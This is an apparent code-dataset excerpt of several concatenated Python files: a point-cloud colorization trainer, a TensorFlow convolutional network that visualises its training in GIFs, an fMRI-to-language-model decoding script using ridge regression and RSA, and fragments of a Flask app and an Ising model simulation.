close_storage(exe):\n \"\"\"closes storage\"\"\"\n storage.close()\n\n\nif __name__ == \"__main__\":\n app.run(host=HOST, port=PORT, threaded=True)\n","sub_path":"api/v1/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"126889802","text":"import os\nimport os.path as osp\nimport logging\nimport gc\nimport numpy as np\n\nimport torch\nimport torch.optim as optim\nimport torch.nn as nn\nimport MinkowskiEngine as ME\n\nfrom model_colorization import load_model\nfrom lib.timer import Timer, AverageMeter\n\ndef colorfulness_metric(points):\n \"\"\"\n :input point: (N*6, xyz, rgb)\n :return: metric of point cloud colors\n \"\"\"\n assert points.shape[1] ==3, 'wrong pcd shape'\n rg = np.abs(points[:, 0] - points[:, 1])\n yb = np.abs(0.5*(points[:, 0] + points[:, 1]) - points[:, 2])\n\n rgMean, rgStd = np.mean(rg), np.std(rg)\n ybMean, ybStd = np.mean(yb), np.std(yb)\n\n stdRoot = np.sqrt((rgStd ** 2) + (ybStd ** 2))\n meanRoot = np.sqrt((rgMean ** 2) + (ybMean ** 2))\n\n return stdRoot + (0.3 * meanRoot)\n\nclass STrainer:\n def __init__(\n self,\n config,\n data_loader=None):\n num_feats = 36\n\n # Model initialization\n Model = load_model(config.model)\n model = Model(\n num_feats,\n config.model_n_out,\n bn_momentum=config.bn_momentum,\n normalize_feature=config.normalize_feature,\n conv1_kernel_size=config.conv1_kernel_size,\n D=3)\n # load pretrained model weights\n if config.weights:\n checkpoint = torch.load(config.weights)\n model.load_state_dict(checkpoint['state_dict'])\n\n # set default hyper parameters\n self.config = config\n self.model = model\n self.max_epoch = config.max_epoch\n self.save_freq = config.save_freq_epoch\n\n if config.use_gpu and not torch.cuda.is_available():\n logging.warning('Warning: There\\'s no CUDA support on this machine, '\n 'training is performed on CPU.')\n raise ValueError('GPU not available, but cuda flag set')\n\n self.device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n self.optimizer = getattr(optim, config.optimizer)(\n model.parameters(),\n lr=config.lr)\n\n self.start_epoch = 1\n self.checkpoint_dir = config.out_dir\n self.iter_size = config.iter_size\n self.batch_size = data_loader.batch_size\n self.data_loader = data_loader\n\n #ensure_dir(self.checkpoint_dir)\n self.model = self.model.to(self.device)\n if config.resume is not None:\n if osp.isfile(config.resume):\n logging.info(\"=> loading checkpoint '{}'\".format(config.resume))\n state = torch.load(config.resume)\n self.start_epoch = state['epoch']\n model.load_state_dict(state['state_dict'])\n self.optimizer.load_state_dict(state['optimizer'])\n\n else:\n raise ValueError(f\"=> no checkpoint found at '{config.resume}'\")\n\n def train(self):\n for epoch in range(self.start_epoch, self.max_epoch + 1):\n lr = self.config.lr\n #logging.info(f\" Epoch: {epoch}, LR: {lr}\")\n self._train_epoch(epoch)\n self._save_checkpoint(epoch)\n\n def _train_epoch(self, epoch):\n gc.collect()\n self.model.train()\n # Epoch starts from 1\n total_loss = 0\n total_num = 0.0\n\n data_loader = self.data_loader\n data_loader_iter = self.data_loader.__iter__()\n\n iter_size = self.iter_size\n #start_iter = (epoch - 1) * (len(data_loader) // iter_size)\n #criterion = nn.MSELoss(reduction='mean')\n criterion = nn.SmoothL1Loss()\n #criterion = nn.CrossEntropyLoss(ignore_index=-1)\n data_meter, data_timer, total_timer = AverageMeter(), Timer(), Timer()\n # Training steps\n for curr_iter in range(len(data_loader) // iter_size): #0-5\n #print(\"#########################\")\n self.optimizer.zero_grad()\n batch_loss = 0\n # records data loading time\n data_time = 0\n total_timer.tic()\n for iter_idx in range(iter_size): #1\n data_timer.tic()\n input_dict = data_loader_iter.next()\n data_time += data_timer.toc(average=False)\n\n # extract feature from network\n sinput = ME.SparseTensor(input_dict['sinput_F'],coords=input_dict['sinput_C']).to(self.device)\n F0 = self.model(sinput).F\n #loss = criterion(F0, input_dict['rgb'].cuda())\n loss1 = criterion(F0[:, 0:3], input_dict['rgb'].cuda())\n loss2 = criterion(F0[:, 3:6], input_dict['rgb'].cuda())\n loss3 = criterion(F0[:, 6:9], input_dict['rgb'].cuda())\n temp = torch.min(loss1, loss2)\n loss = torch.min(temp, loss3) + 0.6 * loss1 + 0.3 * loss2 + 0.15 * loss3\n #loss2 = colorfulness_metric(F0.cpu().detach().numpy())\n loss /= iter_size\n loss.backward()\n batch_loss += loss.item()\n\n self.optimizer.step()\n gc.collect()\n torch.cuda.empty_cache()\n\n total_loss += batch_loss\n total_num += 1.0\n total_timer.toc()\n data_meter.update(data_time)\n\n if curr_iter % self.config.stat_freq == 0:\n #self.writer.add_scalar('train/loss', batch_loss, start_iter + curr_iter)\n print(\"Train Epoch: {} [{}/{}], Current Loss: {:.3e}\".format(epoch, curr_iter, len(self.data_loader) //\n iter_size, batch_loss) + \"\\tData time: {:.4f}, Train time: {:.4f}, Iter time: {:.4f}\".format(\n data_meter.avg, total_timer.avg - data_meter.avg, total_timer.avg))\n data_meter.reset()\n total_timer.reset()\n\n\n def _save_checkpoint(self, epoch, filename='checkpoint'):\n if epoch % self.save_freq == 0:\n state = {\n 'epoch': epoch,\n 'state_dict': self.model.state_dict(),\n 'optimizer': self.optimizer.state_dict(),\n 'config': self.config,\n }\n filename = str(epoch) + '_checkpoint'\n filename = os.path.join(self.checkpoint_dir, f'{filename}.pth')\n logging.info(\"Saving checkpoint: {} ...\".format(filename))\n torch.save(state, filename)\n\n\n","sub_path":"lib/trainer_scannet_2.py","file_name":"trainer_scannet_2.py","file_ext":"py","file_size_in_byte":6331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"503066771","text":"import io\nimport time\nimport cv2\nimport numpy as np\nimport tensorflow as tf\nimport moviepy.editor as mpy\n\ndef make_gif(images, fname, fps=5):\n duration = len(images)/fps\n def make_frame(t):\n return images[int(len(images)/duration*t)]\n clip = mpy.VideoClip(make_frame, duration=duration)\n clip.write_gif(fname, fps=fps)\n\n# network with pooling\nclass network05():\n def __init__(self, myScope, filters=12, learning_rate=0.0001):\n self.pool_kernel_size = (1,6,6,1)\n self.learning_rate = learning_rate\n self.input = tf.placeholder(shape=[None,136,136,3],\n dtype=tf.float32)\n self.conv1_weights = tf.get_variable(name=myScope+\"_conv1_weights\",\n shape=[6,6,3,filters])\n self.conv1_raw = tf.nn.conv2d(input=self.input,\n filter=self.conv1_weights,\n strides=[1,1,1,1], # strides are [batch, height, width, channels]\n padding=\"SAME\",\n name=myScope+\"_conv1\")\n self.conv1_bias = tf.constant(0.1, shape=[filters])\n self.conv1_activated = tf.nn.relu(tf.nn.bias_add(value=self.conv1_raw,\n bias=self.conv1_bias))\n self.conv1 = tf.nn.max_pool(value=self.conv1_activated,\n ksize=self.pool_kernel_size,\n strides=(1,1,1,1),\n padding=\"SAME\")\n\n self.conv2_weights = tf.get_variable(name=myScope+\"_conv2_weights\",\n shape=[6,6,filters,filters])\n self.conv2_bias = tf.constant(1., shape=[filters])\n self.conv2_raw = tf.nn.conv2d(input=self.conv1,\n filter=self.conv2_weights,\n strides=[1,1,1,1], # strides are [batch, height, width, channels]\n padding=\"SAME\",\n name=myScope+\"_conv2\")\n self.conv2_activated = tf.nn.relu(tf.nn.bias_add(value=self.conv2_raw,\n bias=self.conv2_bias))\n self.conv2 = tf.nn.max_pool(value=self.conv2_activated,\n ksize=self.pool_kernel_size,\n strides=(1,1,1,1),\n padding=\"SAME\")\n\n\n\n\n self.conv3_weights = tf.get_variable(name=myScope+\"_conv3_weights\",\n shape=[6,6,filters,filters])\n self.conv3_bias = tf.constant(1., shape=[filters])\n self.conv3_raw = tf.nn.conv2d(input=self.conv2,\n filter=self.conv3_weights,\n strides=[1,1,1,1], # strides are [batch, height, width, channels]\n padding=\"SAME\",\n name=myScope+\"_conv3\")\n self.conv3_activated = tf.nn.relu(tf.nn.bias_add(value=self.conv3_raw,\n bias=self.conv3_bias))\n self.conv3 = tf.nn.max_pool(value=self.conv3_activated,\n ksize=self.pool_kernel_size,\n strides=(1,1,1,1),\n padding=\"SAME\")\n\n\n\n # split the filters into 4 different sets, a number divisible by 3, a set of images for each channel (RGB)\n # allows splitting [1, 136, 136, 12] into 4x[1, 136, 136, 3]\n self.sets = tf.split(value=self.conv3,\n num_or_size_splits=int(filters/3),\n axis=3)\n self.output = tf.reduce_mean(self.sets, axis=0)\n\n\n\n self.target = tf.placeholder(shape=[None,136,136,3],\n dtype=tf.float32)\n self.loss = tf.losses.mean_squared_error(labels=self.target,\n predictions=self.output)\n\n self.trainer = tf.train.AdamOptimizer(learning_rate=self.learning_rate).minimize(self.loss)\n\n\ndef implement_network_05(input_image, target_image, output_implemetation='05'):\n learning_rate = 1e-4\n raw_image = ()\n raw_target = ()\n if isinstance(input_image, tuple):\n for each in input_image:\n each = cv2.cvtColor(cv2.imread(filename=each), cv2.COLOR_BGR2RGB)\n each = np.expand_dims(each, axis=0)\n if len(raw_image) < 1:\n raw_image = each\n else:\n raw_image = np.vstack((raw_image, each))\n else:\n raw_image = cv2.cvtColor(cv2.imread(filename=input_image), cv2.COLOR_BGR2RGB)\n raw_image = np.expand_dims(raw_image, axis=0)\n if isinstance(target_image, tuple):\n for each in target_image:\n each = cv2.cvtColor(cv2.imread(filename=each), cv2.COLOR_BGR2RGB)\n each = np.expand_dims(each, axis=0)\n if len(raw_target) < 1:\n raw_target = each\n else:\n raw_target = np.vstack((raw_target, each))\n else:\n raw_target = cv2.cvtColor(cv2.imread(filename=target_image), cv2.COLOR_BGR2RGB)\n raw_target = np.expand_dims(raw_target, axis=0)\n\n tf.reset_default_graph()\n model = network05(myScope='Nothing_knew', filters=12, learning_rate=learning_rate)\n init = tf.global_variables_initializer()\n conv1_images = []\n output_images = []\n\n with tf.Session() as sess:\n sess.run(init)\n\n total_steps = 10000\n for i in range(total_steps+1):\n _, loss, conv1, conv2, conv3, output = sess.run(fetches=[model.trainer,\n model.loss,\n model.conv1,\n model.conv2,\n model.conv3,\n model.output],\n feed_dict={model.input:raw_image,\n model.target:raw_target})\n print('Step {0:4>d} - loss = {1:,f}\\t\\tconv1 shape is {2:}'.format(i, loss, conv1.shape))\n\n # create a mural of the filtered images\n conv1_processed = np.reshape(a=conv1[0],\n newshape=(conv1[0].shape[1], conv1[0].shape[0] * conv1[0].shape[2]),\n order='F')\n conv2_processed = np.reshape(a=conv2[0],\n newshape=(conv2[0].shape[1], conv2[0].shape[0] * conv2[0].shape[2]),\n order='F')\n conv3_processed = np.reshape(a=conv3[0],\n newshape=(conv3[0].shape[1], conv3[0].shape[0] * conv3[0].shape[2]),\n order='F')\n\n conv_processed = np.vstack((conv1_processed, conv2_processed, conv3_processed))\n\n skip = 100\n # process filter images for gif\n if i%skip == 0:\n f = 'frame {0: 7,d} loss {1: 10,.1f}'.format(i, loss)\n _, buffer = cv2.imencode(\".png\", conv_processed)\n io_buf = io.BytesIO(buffer)\n decoded_img = cv2.imdecode(np.frombuffer(io_buf.getbuffer(), np.uint8), 1)\n _, w, c = decoded_img.shape\n header = np.ones(shape=(20, w, c), dtype=np.uint8)\n header.fill(255)\n cv2.putText(header, f, (2,18), cv2.FONT_HERSHEY_SIMPLEX, 0.4, (0,0,0), 1)\n decoded_img = np.concatenate((header, decoded_img))\n conv1_images.append(decoded_img)\n if i+1 == total_steps:\n for x in range(10):\n conv1_images.append(decoded_img)\n\n # process output image for gif\n # add the raw_input image next to the output image\n if input_image == target_image:\n output_processed = np.hstack((raw_image[0], output[0]))\n else:\n output_processed = np.hstack((raw_image[0], output[0], raw_target[0]))\n\n _, w, c = output_processed.shape\n header = np.ones(shape=(20, w, c), dtype=np.uint8)\n header.fill(255)\n cv2.putText(header, f, (2,18), cv2.FONT_HERSHEY_SIMPLEX, 0.4, (0,0,0), 1)\n\n footer_text_1 = \"input\"\n footer_text_2 = \"output\"\n footer_text_3 = \"target\"\n footer = np.ones(shape=(24, w, c), dtype=np.uint8)\n footer.fill(255)\n cv2.putText(footer, footer_text_1, (30,18), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (0,0,0), 1)\n cv2.putText(footer, footer_text_2, (168,18), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (0,0,0), 1)\n cv2.putText(footer, footer_text_3, (306,18), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (0,0,0), 1)\n\n output_processed = np.concatenate((header, output_processed, footer))\n\n _, buffer = cv2.imencode(\".png\", output_processed)\n io_buf = io.BytesIO(buffer)\n decoded_img = cv2.imdecode(np.frombuffer(io_buf.getbuffer(), np.uint8), -1)\n output_images.append(decoded_img)\n if i+1 == total_steps:\n for x in range(10):\n output_images.append(decoded_img)\n\n make_gif(conv1_images, './output/conv_' + output_implemetation + '.gif', fps=15)\n make_gif(output_images, './output/output_' + output_implemetation + '.gif', fps=15)\n\n raw_image = cv2.cvtColor(cv2.imread(filename='./RGB01.png'), cv2.COLOR_BGR2RGB)\n raw_image = np.expand_dims(raw_image, axis=0)\n output = sess.run(fetches=[model.output], feed_dict={model.input:raw_image})\n cv2.imwrite(filename='./output1.png', img=output[0][0])\n\n#implement_network_04b(input_image='./RGB01plus.png', target_image='./RGB03.png', output_implemetation='04b_01_6x6pool')\n#implement_network_04b(input_image='./RGB01.png', target_image='./RGB03.png', output_implemetation='04b_02_6x6pool')\n\n\n\n","sub_path":"Network_05/network_05.py","file_name":"network_05.py","file_ext":"py","file_size_in_byte":10574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"412664876","text":"import scipy.io\nfrom tqdm import tqdm\nimport pickle\nimport numpy as np\nimport sys\nimport math\nfrom scipy.linalg import lstsq\nfrom sklearn.model_selection import KFold\nimport argparse\nimport os\nimport helper\nfrom scipy.stats import spearmanr\nfrom sklearn.linear_model import Ridge, RidgeCV\nimport scipy.stats as stats\nfrom sklearn.model_selection import train_test_split\n# import statsmodels.api as sm\n\ndef all_activations_for_all_sentences(modified_activations, volmask, embed_matrix, args, radius=5, kfold_split=5, alpha=1):\n\tglobal temp_file_name\n\n\tprint(\"getting activations for all sentences...\")\n\tres_per_spotlight = []\n\tpredictions = []\n\trankings = []\n\tllhs = []\n\ta,b,c = volmask.shape\n\tnonzero_pts = np.transpose(np.nonzero(volmask))\n\ttrue_spotlights = []\n\n\t# iterate over spotlight\n\tprint(\"for each spotlight...\")\n\n\tindex=0\n\tnn_matrix = calculate_dist_matrix(embed_matrix) if args.rsa else None \n\tfor pt in nonzero_pts:\n\t\tx1,y1,z1 = pt\n\t\tspotlights = []\n\t\t# iterate over each sentence\n\t\tfor sentence_act in modified_activations:\n\t\t\tspot = sentence_act[x1][y1][z1]\n\t\t\tremove_nan = np.nan_to_num(spot).astype(np.float32)\n\t\t\tspotlights.append(remove_nan)\n\n\t\tprint(np.array(spotlights).shape)\n\n\t\ttrue_spotlights.append(spotlights)\n\n\t\t## DECODING BELOW\n\t\tif args.rsa: \n\t\t\tres = rsa(nn_matrix, np.array(spotlights))\n\t\telse: \n\t\t\tres, pred, llh, rank = linear_model(embed_matrix, spotlights, args, kfold_split, alpha)\n\t\t\tpredictions.append(pred)\n\t\t\tllhs.append(llh)\n\t\t\trankings.append(rank)\n\t\t\tprint(\"LLH: \" + str(llh))\n\t\t\tprint(\"RANK: \" + str(rank))\n\n\t\tprint(\"RES for SPOTLIGHT #\", index, \": \", res)\n\t\tres_per_spotlight.append(res)\n\n\t\tindex+=1\n\t\t## DECODING ABOVE\n\n\treturn res_per_spotlight, llhs, rankings\n\n### RSA ###\ndef calculate_dist_matrix(matrix_embeddings): \n\tn = matrix_embeddings.shape[0]\n\tmat = np.zeros(shape=(n*(n-1)//2,))\n\tcosine_sim = lambda x, y: np.dot(x, y) / (np.linalg.norm(x, ord=2) * np.linalg.norm(y, ord=2))\n\tit = 0\n\tfor i in range(n): \n\t\tfor j in range(i):\n\t\t\tmat[it] = cosine_sim(matrix_embeddings[i], matrix_embeddings[j]) \n\t\t\tit += 1\n\treturn mat \n\ndef rsa(embed_matrix, spotlights): \n\tspotlight_mat = calculate_dist_matrix(spotlights)\n\tcorr, _ = spearmanr(spotlight_mat, embed_matrix)\n\treturn corr\n\n### LIKELIHOOD ###\ndef find_log_pdf(arr, sigmas):\n\tval = stats.norm.logpdf(arr, 0, sigmas)\n\treturn np.nansum(val)\n\ndef vectorize_llh(pred, data, sigmas):\n\tresiduals = np.subtract(data, pred)\n\tllh = np.nansum(stats.norm.logpdf(residuals, 0, sigmas))\n\treturn llh\n\n### SPECIFYING THE LINEAR MODEL ### \ndef linear_model(embed_matrix, spotlight_activations, args, kfold_split, alpha):\n\tglobal predicted_trials\n\n\tpredicted = []\n\tif args.brain_to_model:\n\t\tfrom_regress = np.array(spotlight_activations)\n\t\tto_regress = np.array(embed_matrix)\n\telse:\n\t\tfrom_regress = np.array(embed_matrix)\n\t\tto_regress = np.array(spotlight_activations)\n\n\tprint(\"FROM REGRESS: \" + str(from_regress.shape))\n\tprint(\"TO REGRESS: \" + str(to_regress.shape))\n\n\tif args.cross_validation:\n\t\touter_kf = KFold(n_splits=kfold_split, shuffle=True)\n\n\t\terrors = []\n\t\tpredicted_trials = np.zeros((to_regress.shape[0],))\n\t\tllhs = []\n\t\trankings = []\n\n\t\tif args.add_bias:\n\t\t\tfrom_regress = helper.add_bias(from_regress)\n\n\t\tif args.permutation:\n\t\t\tnp.random.shuffle(from_regress)\n\n\t\tfor train_index, test_index in outer_kf.split(from_regress):\n\t\t\tgreatest_possible_rank = len(test_index)\n\n\t\t\tX_train, X_test = from_regress[train_index], from_regress[test_index]\n\t\t\ty_train, y_test = to_regress[train_index], to_regress[test_index]\n\n\t\t\t# nested CV\n\t\t\tinner_kf = KFold(n_splits=kfold_split, shuffle=True)\n\t\t\talphas = np.logspace(-10, 10, 21, endpoint=True) \n\t\t\tclf = RidgeCV(alphas=alphas).fit(X_train, y_train)\n\t\t\tbest_alpha = clf.alpha_\n\n\t\t\t# with ridge regression\n\t\t\tclf = Ridge(alpha=best_alpha)\n\t\t\tclf.fit(X_train, y_train)\n\t\t\ty_hat_test = clf.predict(X_test)\n\t\t\tpredicted_trials[test_index] = y_hat_test\n\n\t\t\tif args.llh:\n\t\t\t\tn = X_train.shape[0]\n\t\t\t\tk = X_train.shape[1]\n\t\t\t\ty_hat_train = clf.predict(X_train)\n\t\t\t\tsigma_train = np.sum((y_hat_train - y_train)**2, axis=0)\n\t\t\t\tllh = vectorize_llh(y_hat_test, y_test, sigma_train)\n\t\t\t\tllhs.append(llh)\n\n\t\t\tif args.ranking and args.model_to_brain:\n\t\t\t\ty_hat_test_reshape = y_hat_test.reshape((len(y_hat_test), 1))\n\t\t\t\ty_test_reshape = y_test.reshape((len(y_test), 1))\n\n\t\t\t\ttrue_distances = helper.calculate_true_distances(y_hat_test_reshape, y_test_reshape)\n\t\t\t\tprint(\"TRUE DISTANCES: \" + str(true_distances.shape))\n\t\t\t\tdistance_matrix = helper.compute_distance_matrix(y_hat_test_reshape, y_test_reshape)\n\t\t\t\tprint(\"DISTANCE MATRIX: \" + str(distance_matrix.shape))\n\t\t\t\trank = helper.calculate_rank(true_distances, distance_matrix)\n\t\t\t\trank_accuracy = 1 - (rank - 1) * 1.0 / (greatest_possible_rank - 1)\n\t\t\t\trankings.append(rank_accuracy)\n\t\terrors = np.sqrt(np.sum(np.abs(np.array(predicted_trials) - to_regress)))\n\t\treturn errors.astype(np.float32), predicted_trials, np.sum(llhs).astype(np.float32), np.mean(rankings).astype(np.float32)\n\treturn\n\n### MIXED EFFECTS ANALYSIS ###\ndef get_modified_activations(activations, volmask):\n\ti,j,k = volmask.shape\n\tnonzero_pts = np.transpose(np.nonzero(volmask))\n\tmodified_activations = []\n\tfor sentence_activation in tqdm(activations):\n\t\tone_sentence_act = np.zeros((i,j,k))\n\t\tfor pt in range(len(nonzero_pts)):\n\t\t\tx,y,z = nonzero_pts[pt]\n\t\t\tone_sentence_act[int(x)][int(y)][int(z)] = sentence_activation[pt]\n\t\tmodified_activations.append(one_sentence_act)\n\treturn modified_activations\n\ndef run_per_voxel(df, labels, conditional_labels):\n\ttraining_data, testing_data = train_test_split(df, test_size=0.2)\n\n\tmd = smf.mixedlm('embedding ~ 1 + ' + str(labels) + ' + (1 + ' + str(conditional_labels) + ' )', training_data, groups=training_data[\"subject_number\"])\n\tmdf = md.fit()\n\tprint(mdf.summary())\n\n\ty_hat_test = mdf.predict(testing_data)\n\ty_true = testing_data['activations']\n\n\tprint(\"CHECK SIZE: \")\n\trmse = np.sqrt(np.sum(np.abs(y_hat_test - y_true)))\n\treturn rmse\n\ndef mixed_effects_analysis(args, embed_matrix):\n\t# load common brain space\n\tsubjects = [1,2,4,5,7,8,9,10,11]\n\tcommon_space = helper.load_common_space(subjects, local=args.local)\n\tvoxel_coordinates = np.transpose(np.nonzero(common_space))\n\tnum_voxels = len(voxel_coordinates)\n\tprint(\"NUM VOXELS IN SHARED COMMON BRAIN SPACE: \" + str(num_voxels))\n\n\t# initialize variables\n\tall_activations = []\n\tsubj_number = []\n\tvoxel_index = []\n\n\t# prepare model embeddings \n\tdim_labels = ['dim'+str(i) for i in range(embed_matrix.shape[1])]\n\tembed_matrix_pd = pd.DataFrame(embed_matrix, columns=dim_labels)\n\tembed_matrix_pd_repeat = pd.concat([embed_matrix_pd]*len(subjects), ignore_index=True)\n\tprint(\"LENGTH OF EMBEDDINGS: \" + str(len(embed_matrix_pd_repeat)))\n\n\t# get labels\n\tlabels = \"\"\n\tconditional_labels = \"\"\n\tfor i in range(embed_matrix.shape[1]):\n\t\tlabels += 'dim' + str(i) + ' '\n\t\tconditional_labels += 'dim' + str(i) + ' | subject_number '\n\n\t# get data\n\tfor subj in subjects:\n\t\tactivation = pickle.load( open( f\"/n/shieber_lab/Lab/users/cjou/fmri/subj{args.subject_number}/activations.p\", \"rb\" ) )\n\t\tactivation_vals = activation[np.nonzero(common_space)]\n\t\tmodified_activations = get_modified_activations(activation_vals, common_space)\n\t\tall_activations.append(modified_activations)\n\t\tvoxel_index.append(range(num_voxels))\n\t\tsubj_number.extend([subj] * num_voxels)\n\t\n\t# create dataframe\n\tdata = pd.DataFrame({\n\t\t'subject_number': subj_number,\n\t\t'voxel_index': voxel_index,\n\t\t'activations': all_activations\n\t\t})\n\n\tdata_slice = data.iloc[data[\"voxel_index\"] == 0]\n\tprint(\"DATA SLICE LENGTH: \" + str(len(data_slice)))\n\n\t# per voxel\n\trmses_per_voxel = []\n\tfor v in range(num_voxels):\n\t\tdata_slice = data.iloc[data[\"voxel_index\"] == v]\n\t\tconcat_pd = pd.concat([data_slice, embed_matrix_pd_repeat], axis=1)\n\t\trmse = run_per_voxel(concat_pd, labels, conditional_labels)\n\t\trmses_per_voxel.append(rmse)\n\t\t\n\treturn rmses_per_voxel\n\ndef main():\n\tglobal temp_file_name\n\n\targparser = argparse.ArgumentParser(description=\"Decoding (linear reg). step for correlating NN and brain\")\n\targparser.add_argument('--embedding_layer', type=str, help=\"Location of NN embedding (for a layer)\", required=True)\n\targparser.add_argument(\"--rsa\", action='store_true', default=False, help=\"True if RSA is used to generate residual values\")\n\targparser.add_argument(\"--brain_to_model\", action='store_true', default=False, help=\"True if regressing brain to model, False if not\")\n\targparser.add_argument(\"--model_to_brain\", action='store_true', default=False, help=\"True if regressing model to brain, False if not\")\n\targparser.add_argument(\"--which_layer\", help=\"Layer of interest in [1: total number of layers]\", type=int, default=1)\n\targparser.add_argument(\"--cross_validation\", action='store_true', default=True, help=\"True if add cross validation, False if not\")\n\targparser.add_argument(\"--subject_number\", type=int, default=1, help=\"subject number (fMRI data) for decoding\")\n\targparser.add_argument(\"--random\", action='store_true', default=False, help=\"True if initialize random brain activations, False if not\")\n\targparser.add_argument(\"--rand_embed\", action='store_true', default=False, help=\"True if initialize random embeddings, False if not\")\n\targparser.add_argument(\"--glove\", action='store_true', default=False, help=\"True if initialize glove embeddings, False if not\")\n\targparser.add_argument(\"--word2vec\", action='store_true', default=False, help=\"True if initialize word2vec embeddings, False if not\")\n\targparser.add_argument(\"--bert\", action='store_true', default=False, help=\"True if initialize bert embeddings, False if not\")\n\targparser.add_argument(\"--normalize\", action='store_true', default=False, help=\"True if add normalization across voxels, False if not\")\n\targparser.add_argument(\"--permutation\", action='store_true', default=False, help=\"True if permutation, False if not\")\n\targparser.add_argument(\"--permutation_region\", action='store_true', default=False, help=\"True if permutation by brain region, False if not\")\n\targparser.add_argument(\"--add_bias\", action='store_true', default=True, help=\"True if add bias, False if not\")\n\targparser.add_argument(\"--llh\", action='store_true', default=True, help=\"True if calculate likelihood, False if not\")\n\targparser.add_argument(\"--ranking\", action='store_true', default=False, help=\"True if calculate ranking, False if not\")\n\targparser.add_argument(\"--mixed_effects\", action='store_true', default=False, help=\"True if calculate mixed effects, False if not\")\n\n\t### UPDATE FILE PATHS HERE ###\n\targparser.add_argument(\"--fmri_path\", default=\"/n/shieber_lab/Lab/users/cjou/fmri/\", type=str, help=\"file path to fMRI data on the Odyssey cluster\")\n\targparser.add_argument(\"--to_save_path\", default=\"/n/shieber_lab/Lab/users/cjou/\", type=str, help=\"file path to and create rmse/ranking/llh on the Odyssey cluster\")\n\t### UPDATE FILE PATHS HERE ###\n\t\n\targs = argparser.parse_args()\n\n\tif not args.glove and not args.word2vec and not args.bert and not args.rand_embed:\n\t\tembed_loc = args.embedding_layer\n\t\tfile_name = embed_loc.split(\"/\")[-1].split(\".\")[0]\n\t\tembedding = scipy.io.loadmat(embed_loc)\n\t\tembed_matrix = helper.get_embed_matrix(embedding)\n\telse:\n\t\tembed_loc = args.embedding_layer\n\t\tfile_name = embed_loc.split(\"/\")[-1].split(\".\")[0].split(\"-\")[-1] + \"_layer\" + str(args.which_layer) # aggregation type + which layer\n\t\tembed_matrix = np.array(pickle.load( open( embed_loc , \"rb\" ) ))\n\n\tdirection, validate, rlabel, elabel, glabel, w2vlabel, bertlabel, plabel, prlabel = helper.generate_labels(args)\n\n\t# get modified activations\n\tactivations = pickle.load( open( \"{}subj{}/activations.p\".format(args.fmri_path, args.subject_number), \"rb\" ) )\n\tvolmask = pickle.load( open( \"{}subj{}/volmask.p\".format(args.fmri_path, args.subject_number), \"rb\" ) )\n\tmodified_activations = pickle.load( open( \"{}subj{}/modified_activations.p\".format(args.fmri_path, args.subject_number), \"rb\" ) )\n\n\tprint(\"PERMUTATION: \" + str(args.permutation))\n\tprint(\"PERMUTATION REGION: \" + str(args.permutation_region))\n\n\tprint(\"PLABEL: \" + str(plabel))\n\tprint(\"PRLABEL: \" + str(prlabel))\n\n\tif args.normalize:\n\t\tmodified_activations = helper.z_score(modified_activations)\n\t\tembed_matrix = helper.z_score(embed_matrix)\n\n\tif args.random:\n\t\tprint(\"RANDOM ACTIVATIONS\")\n\t\tmodified_activations = np.random.randint(-20, high=20, size=(240, 79, 95, 68))\n\n\t# make file path\n\tif not os.path.exists('{}residuals_od32/'.format(args.to_save_path)):\n\t\tos.makedirs('{}residuals_od32/'.format(args.to_save_path))\n\n\tif not os.path.exists('{}final_rankings/'.format(args.to_save_path)):\n\t\tos.makedirs('{}final_rankings/'.format(args.to_save_path))\n\n\tif not os.path.exists('{}rsa/'.format(args.to_save_path)):\n\t\tos.makedirs('{}rsa/'.format(args.to_save_path))\n\n\tif not os.path.exists('{}nested_llh/'.format(args.to_save_path)):\n\t\tos.makedirs('{}nested_llh/'.format(args.to_save_path))\n\n\ttemp_file_name = str(plabel) + str(prlabel) + str(rlabel) + str(elabel) + str(glabel) + str(w2vlabel) + str(bertlabel) + str(direction) + str(validate) + \"-subj\" + str(args.subject_number) + \"-\" + str(file_name) + \"_no_spotlight\"\n\t\n\tif args.mixed_effects:\n\t\tval = mixed_effects_analysis(args, embed_matrix)\n\telse:\n\t\tall_residuals, llhs, rankings = all_activations_for_all_sentences(modified_activations, volmask, embed_matrix, args)\n\n\t# dump\n\tif args.rsa:\n\t\tfile_name = '{}rsa/'.format(args.to_save_path) + str(temp_file_name) + \".p\"\n\t\tpickle.dump( all_residuals, open(file_name, \"wb\" ) )\n\t\n\telse:\n\t\tif args.llh:\n\t\t\tllh_file_name = '{}nested_llh/'.format(args.to_save_path) + temp_file_name\n\t\t\tprint(\"LLH SPOTLIGHTS FILE: \" + str(llh_file_name))\n\t\t\tpickle.dump( llhs, open(llh_file_name+\"-llh.p\", \"wb\" ), protocol=-1 )\n\n\t\taltered_file_name = '{}residuals_od32/'.format(args.to_save_path) + temp_file_name\n\t\tprint(\"RESIDUALS FILE: \" + str(altered_file_name))\n\t\tpickle.dump( all_residuals, open(altered_file_name + \".p\", \"wb\" ), protocol=-1 )\n\n\t\tif args.model_to_brain and args.ranking:\n\t\t\tranking_file_name = '{}final_rankings/'.format(args.to_save_path) + temp_file_name\n\t\t\tprint(\"RANKING FILE: \" + str(ranking_file_name))\n\t\t\tpickle.dump( rankings, open(ranking_file_name + \".p\", \"wb\" ), protocol=-1 )\n\n\tprint(\"done.\")\n\n\treturn\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"nested_decoding.py","file_name":"nested_decoding.py","file_ext":"py","file_size_in_byte":14185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"400938735","text":"# -*- coding: utf-8 -*-\n\nimport numpy as np\n\nfrom isingmodel.data import SimulationData, SimulationParameters\nfrom isingmodel.lattice import BinaryLattice\nimport isingmodel\n\n\ndef simulation(parameters: SimulationParameters) -> SimulationData:\n \"\"\"Run the Ising model simulation.\n\n :param parameters: Parameters to use for setting up and running the simulation.\n :return: Output of the Ising model simulation.\n \"\"\"\n np.random.seed(parameters.seed)\n\n lattice: BinaryLattice = BinaryLattice(\n parameters.dimensions,\n 